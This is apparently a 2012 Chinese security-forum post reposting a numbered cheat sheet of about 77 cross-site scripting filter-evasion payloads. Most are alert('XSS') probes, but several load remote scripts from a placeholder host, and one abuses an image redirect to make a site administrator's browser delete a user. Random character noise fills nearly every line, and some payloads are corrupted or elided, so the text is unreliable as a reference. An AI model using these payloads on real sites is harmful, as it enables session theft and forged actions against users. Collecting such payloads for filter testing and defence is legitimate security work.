貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! b8 H) y% o( P# W' `" a7 G( Y: v4 h
(1)普通的XSS JavaScript注入
( Z5 t0 S g$ j5 J% a, v( z( p2 } <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 E# C% `4 h* X+ H; _* q0 {7 y0 Y7 D% E/ G+ n( ^9 T
(2)IMG标签XSS使用JavaScript命令1 c* }+ x! s( d7 q5 e, e0 W+ U+ ]$ X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: l' g$ Y5 h+ m
" Y+ a* G( T- [* K; l! _ (3)IMG标签无分号无引号( V t( a+ {% r5 {5 v4 `! _1 a- C2 p
<IMG SRC=javascript:alert(‘XSS’)>
, y0 x) e' X: v( s" ?
- i9 y2 x5 Q% c$ B' I- X (4)IMG标签大小写不敏感) k+ b! d& Z* y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 ] \1 S# x$ E
/ I! h( j* ?. U9 |. e. {+ ], M (5)HTML编码(必须有分号)
7 g [& S, [2 f8 f4 M2 q5 r7 { <IMG SRC=javascript:alert(“XSS”)>8 p, o, O1 k2 G8 Q
- A- u" y! `* @( h8 j3 ~8 G
(6)修正缺陷IMG标签# Z% r6 P9 {" m; N/ Q( ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ j9 \' T0 Z- r+ P! [1 e/ c- a! F7 S! `" S! z* x8 @( j: O7 w6 @
(7)formCharCode标签(计算器)
. Q# r0 j0 s5 R7 n4 Y2 O <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>& d- H' X# P& T( J: F
. P1 O* t' K# Z5 F (8)UTF-8的Unicode编码(计算器)4 g( {% Z9 Y2 a J$ V/ _+ t+ |
<IMG SRC=jav..省略..S')>! ]9 c5 w7 Z1 U" U$ i( N& S
1 o! @3 P y9 O" j
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, e* F+ E- Q: h0 \( x7 Y2 t <IMG SRC=jav..省略..S')># b, y, D% l; E6 k
0 ]) E% L5 M" _2 Q; o$ _7 X (10)十六进制编码也是没有分号(计算器)5 N4 H7 P& y. W8 j6 M" m z
<IMG SRC=java..省略..XSS')>8 Q: R H+ g. F: V& t# P1 Q6 j
6 n( e9 d# [! W
(11)嵌入式标签,将Javascript分开
( U; h" G! y+ D: R: w5 C <IMG SRC=”jav ascript:alert(‘XSS’);”>
1 Z0 I2 N+ x3 h5 l% K3 Y9 M
$ K9 x j5 p( T7 S# @ (12)嵌入式编码标签,将Javascript分开' R! t. k) k; O) Y' x
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 p( I. l- T1 y5 F3 S* W& }0 |! S4 _ q% b' _) O
(13)嵌入式换行符; p8 N, T }% T! i3 u
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 j# ]7 P/ y7 g. V* O) i5 k
, \% U r* w3 V* h9 J0 j9 X. P# i
(14)嵌入式回车
5 f! d2 I {" C5 r8 q <IMG SRC=”jav ascript:alert(‘XSS’);”>
) A& ]; W7 n' ]6 j% c& t; i3 e6 W
% } Z& y! ^, `9 ~/ X (15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 k% C8 A5 b* f. s: ]2 w; c <IMG SRC=”javascript:alert(‘XSS‘)”>
% q& h% U# x/ Z9 p6 v
k- [/ V% p- Z Y8 S2 ] (16)解决限制字符(要求同页面)% C1 `% Y/ }- I( e
<script>z=’document.’</script>
8 J1 m6 M' r2 o! ~+ z/ Y+ c <script>z=z+’write(“‘</script>0 j8 X7 Q. g0 n; Z: J" _0 b ^% o
<script>z=z+’<script’</script>
! H) c* S. X) g: p# G <script>z=z+’ src=ht’</script>
5 u5 b8 x m, R' t <script>z=z+’tp://ww’</script>
4 Q# p8 G/ H- f1 N <script>z=z+’w.shell’</script>& e ^; _3 P! I; ^. P/ }/ `' U
<script>z=z+’.net/1.’</script>) F& C; Z: l- n& C% p
<script>z=z+’js></sc’</script>
0 W Q- f3 H. n <script>z=z+’ript>”)’</script>
1 H9 h# p; p( H0 p! ?4 j <script>eval_r(z)</script>
6 A C! p! p2 X# D- z4 ^, K
1 z1 C( J; X) X. K7 {6 |# X& y (17)空字符0 E- }5 }* c9 G9 |6 y R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( u, O' Z( q; D- Z3 S* J/ d, Y9 v
# U! r9 y& m, C; J
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( E* C5 O; a& a. A2 {% M
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, k q, G& E( A
+ C1 a" ]# n1 Y! s (19)Spaces和meta前的IMG标签9 F! T& g3 O* c/ j u
<IMG SRC=” � javascript:alert(‘XSS’);”>/ n+ l0 D. `# @
+ \ d. J2 `. a (20)Non-alpha-non-digit XSS
1 s* n1 O p& i, C) V$ B <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 P% u4 H; `3 G( b- b
( o" ]6 Q% [% T (21)Non-alpha-non-digit XSS to 2, k* G, C: P3 T3 C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ L! d" Y) c& m* d. i. r( X, x
1 g) h7 ~7 x- l( \1 |4 f
(22)Non-alpha-non-digit XSS to 31 v1 _# ?/ o- e6 V1 l( t) A( V
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ K6 B) S0 [) c4 ?/ a0 M
: m3 b/ g7 z5 q" v) {( C' U (23)双开括号 n3 \. [2 h& F2 d3 ]& G# N3 I
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
) H- ^; d2 G6 k
4 v, @) X7 G# J+ W3 b9 Z (24)无结束脚本标记(仅火狐等浏览器)
) D& o" i; C4 w! n X. g" o <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. i# U( ~, a# v n* }
! Q& Y- [2 w, i% F; P/ I# m4 C- o% T V (25)无结束脚本标记2( j+ e C- W8 n) n: n
<SCRIPT SRC=//3w.org/XSS/xss.js> x" a0 D* {/ p# Z
& t1 `6 Z b# E6 ^) w (26)半开的HTML/JavaScript XSS$ \1 n# B8 e. y6 W9 k! a( n1 ]
<IMG SRC=”javascript:alert(‘XSS’)”; F' [. B* j1 D' m$ j }; f' @
9 o( M) W6 w7 h& @7 R: ]( o
(27)双开角括号
% V: E0 @9 l6 D5 \# ]: k <iframe src=http://3w.org/XSS.html <9 }5 c1 I3 _# j$ [) ^9 \
! w* D+ T1 H. B: E3 b7 ` (28)无单引号 双引号 分号
7 B# A9 h7 l4 c1 t" s! O <SCRIPT>a=/XSS/
4 b# y4 b2 T2 Z( Y; \3 K7 l: P- W alert(a.source)</SCRIPT>
8 S/ [- A+ @4 R+ a! w: k
+ H. u* p! R( O+ o1 _ (29)换码过滤的JavaScript
2 ^ ]2 g% X( { \”;alert(‘XSS’);//
. S! E' q+ M2 k0 L" y' l4 ^& e
6 F9 S$ g1 x9 g4 T3 y; c1 N (30)结束Title标签& @5 i2 y' _+ }6 t$ x% M/ h& @
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& C4 K1 k& e! ~. E' y' m& t
z" f9 n) i+ D8 ?) O! Y* y
(31)Input Image" D! [4 x0 m6 M4 G! L; G
<INPUT SRC=”javascript:alert(‘XSS’);”>
' _7 w) C" h1 H+ j7 s/ E A6 Q# T7 r
& a8 l& C `8 z; h$ R7 R (32)BODY Image
( C: k+ O+ `; C6 q8 z4 x <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
J* L' a" o/ M
6 P$ c4 M$ C0 c (33)BODY标签
0 ~- r: r( j0 |" B9 _) U <BODY(‘XSS’)>
6 [3 Q! d5 k1 Z+ M* E
[* ^. `) _' L. L5 W& k. U (34)IMG Dynsrc
! @# q' l2 i/ G, h9 g <IMG DYNSRC=”javascript:alert(‘XSS’)”>" z0 G0 [6 H% Y% i0 S* x7 M
* o+ T# H, r8 f/ k$ |0 H (35)IMG Lowsrc! A9 C1 ~8 ?6 P* T# u
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
" i/ n, O' W+ d. U( R' K0 F5 z# V& z& B* Q5 Z/ j/ ~ A
(36)BGSOUND2 W2 t8 b2 w( a+ F. i
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. I' n0 o* r s% |! z5 O* ^9 A- h0 m1 W
(37)STYLE sheet
% c, B3 B1 t) N- x) l: c <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 Z/ B8 H) J7 H7 q/ p4 D9 n, [
3 V7 I, `) x/ [. X: s m (38)远程样式表2 A9 q6 H# _( l# R$ g5 [* I" g
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, \9 @4 J& B) ~; D' Y
# s- Z: l7 k: c! T: n1 i, H2 E (39)List-style-image(列表式)/ G% M- V* b+ h `% P+ T
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- f5 g" P4 j8 y# g: z/ h8 k
6 ]$ i5 {7 p" T- \ (40)IMG VBscript
* r5 Q$ C- O3 R B) N <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ [+ Q' Z# W; q/ f$ ]! B8 Q
! P4 c S% B O# [0 `' U7 B (41)META链接url: K* G; A* B5 S! h) z
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* S. W2 x+ E6 m. F, l
- }8 G! x D" N1 Z (42)Iframe
9 O( q [$ `. n; |# {0 m O. a! n9 N <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 O! `: l. d! p' M5 C. k r; q% H
& P. ?/ A& Q: m1 {. k; @1 w ^ (43)Frame
& ^$ N l6 Z: H" w, I" { <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 ]+ m3 y, c2 U
! t3 r( {/ Q4 n8 i$ ? (44)Table$ u: v2 d' ?1 z) T/ v& O
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& ^6 e& j- C: a' g' b+ M. B9 Z0 g6 B: [
(45)TD
x: j! X9 y9 U+ Y8 [ <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 c8 s# l3 s' y, p% \$ k
' a4 ~* S9 l9 N, D5 w (46)DIV background-image
$ T( \: O& w$ {( Q- O* ~" k <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 ^- _# n' T8 ~1 i, p5 T9 Y! C
, k0 Y6 h2 k8 B. I5 u; N (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)( Y1 P- z4 ^4 f$ s- ]& }
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
! T& q2 s1 }# I X$ h# l; p M$ c I0 g( \% N8 S
(48)DIV expression' i5 Z! w, V8 T8 H8 ?
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; h- w( t; B. X( _0 e0 _( N/ Z3 V; c0 t1 H' `# ?
(49)STYLE属性分拆表达& p* \0 q# g& ]! ]) Q: {8 H3 O/ Y5 z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 C; T* }! s J( M) v
$ a/ B# L: o O$ z (50)匿名STYLE(组成:开角号和一个字母开头)
1 e7 N7 j# O3 ?. K <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 X+ _: L7 @; E8 G4 A: @1 p
- k$ a8 n: Y) C" \5 \3 g, M+ F* m
(51)STYLE background-image3 C6 q- C# j( ~ c
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( b* l+ J; N4 m0 f( g; t3 u
; }" Q3 j6 P" [+ v; a8 t* R! ~0 D (52)IMG STYLE方式
) [. Q" y3 r3 R9 g8 A% c9 @ exppression(alert(“XSS”))’>: h: _/ ~* L; K% _ {/ f
" v+ z# ]$ h% z. U+ O (53)STYLE background. ~4 i9 k" T3 a9 z6 F, B
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% j7 `, g( \( w3 d+ u/ g# N
; w3 E1 L% R( H a5 N (54)BASE
4 C% ?% h% z# v <BASE HREF=”javascript:alert(‘XSS’);//”>
( ]( K. U b, G [5 g, a3 p' H$ Q* H/ f3 u1 E/ l% Z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 q( c% J4 t6 W( N* h <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 d& `# C% O7 @% M' W* ~
, `) ^) T9 L" r! @1 r6 u0 ? Q (56)在flash中使用ActionScrpt可以混进你XSS的代码3 w3 Z* D2 g* f+ T1 z: Q6 j* h% v9 t
a=”get”;7 y. ]/ i, T! K; `- r+ V
b=”URL(\”";
/ K* g& a! O9 u* q6 a1 f5 g! i! A c=”javascript:”;
+ v9 B- p. {9 S& I! Z4 ^ d=”alert(‘XSS’);\”)”;* C4 O. N, O# T9 {- L# z7 w6 A
eval_r(a+b+c+d);
! B8 k" g" W: `" R9 l' C) Z
8 }* a8 v4 l9 [% ~( x (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 E6 t; K$ S$ _# Q, f- q" A% i
<HTML xmlns:xss>* R3 z# G. E" R8 W" }2 j+ a
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 i- f$ f, e+ U5 j7 |8 {7 j
<xss:xss>XSS</xss:xss>5 ~- k+ _& T4 H) u
</HTML>( t8 Z) g8 ?4 Y
( p# |' D) r7 J i (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 r7 C9 [, N7 _! K+ I( @& @ <SCRIPT SRC=””></SCRIPT>: a2 ~1 {" `+ a; l$ |9 \( J
`! ^! Y1 L; ^( k
(59)IMG嵌入式命令,可执行任意命令
( i! i9 z. G7 U9 @8 n! P <IMG SRC=”http://www.XXX.com/a.php?a=b”>! x" K" \0 H( R1 j, s
& x5 u; d, L: B9 F0 J3 [ (60)IMG嵌入式命令(a.jpg在同服务器)
6 f1 O9 @; O3 v6 ]# I Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser7 f! @% e: ~) r
* Q9 f5 v, I: a( n P
(61)绕符号过滤
! I; }$ u8 S5 n/ R( m <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ |- B0 A, V" B- ^9 ]2 s% q; V' q; W. [5 A5 u
(62)
8 j U ]1 T# _6 q- h# p! I% ] <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 ~; v6 p8 u8 h% ~. t3 U/ H: _
' ]8 a) p$ Z: l! \( k (63)' \) F# ` u$ C
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 F, [/ D% y. n8 g, D3 q5 H* G( S
(64)2 X. w8 K0 |' J- w/ }$ _
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 Q' [& r* e. ^
6 j" L/ ]8 Z8 ~) e% N) T& \ (65)& Z: ?7 T6 }/ k* d$ p
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* A' I* I9 E' q+ h( S# d% f
2 a* J/ w$ ^% }% E6 c4 m3 C (66)
, ?2 l. S9 v! _% u- @) e <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>, t- Y- x- D( N, T& t/ e
) |/ A, y0 j: `# |4 c. a (67)
0 K+ P" X! l) o1 z; L5 S0 ` <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
* g: J/ J- T9 o5 D
' G1 s2 ?) c1 M, G) d (68)URL绕行4 N& i6 v. b' q) L
<A HREF=”http://127.0.0.1/”>XSS</A># g* }1 j: h) M" E5 ^) f
Q. ~+ R& |# n
(69)URL编码7 o1 p; J+ t. @& X' O+ h" W3 S* U
<A HREF=”http://3w.org”>XSS</A>
: g% A5 @' ^& U0 p7 N$ U" K7 Z- K' r0 F2 F: U" S& Y d# M* ^ r
(70)IP十进制% {+ D3 x5 y, _3 C5 o
<A HREF=”http://3232235521″>XSS</A>" }- _+ v/ W! e% ?6 `
% d: x6 I# M3 g% t* g
(71)IP十六进制7 O+ }4 u! p* @
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
, q( `' B1 D8 X* K$ S( f) @& C* c g( ], \) g
(72)IP八进制
: C, f/ W0 g1 w1 e I) e L5 e <A HREF=”http://0300.0250.0000.0001″>XSS</A>' y7 m- Y Z( ^* i
6 A, k+ a/ n) o6 @3 s7 k (73)混合编码7 y" x6 D1 Y& |8 H9 U( J
<A HREF=”h
. {! g4 B5 |8 @) D; _) i3 a tt p://6 6.000146.0×7.147/”">XSS</A> \! }, m+ I# t, I% z
+ b- _8 ^" D" \+ b, P7 S& U (74)节省[http:]8 r' M+ N) I2 q7 s3 V0 O& ~
<A HREF=”//www.google.com/”>XSS</A>% H' m- S; e/ |" y7 K, P2 `' v! S
/ E& k) {" [: _7 Y4 f' B% @
(75)节省[www]$ \( j0 L3 D5 a( H( K; _- B& r
<A HREF=”http://google.com/”>XSS</A>
* z9 b+ h. ^/ E) Z
/ P- B' U+ O: h! D! f- d (76)绝对点绝对DNS: B: D8 U# u% b, A
<A HREF=”http://www.google.com./”>XSS</A>
* W Z+ `5 Q* e: L6 d: f
$ J( P+ B0 ?& v2 ]$ K5 h% { (77)javascript链接
7 s5 A; R' |7 {% @" Q <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对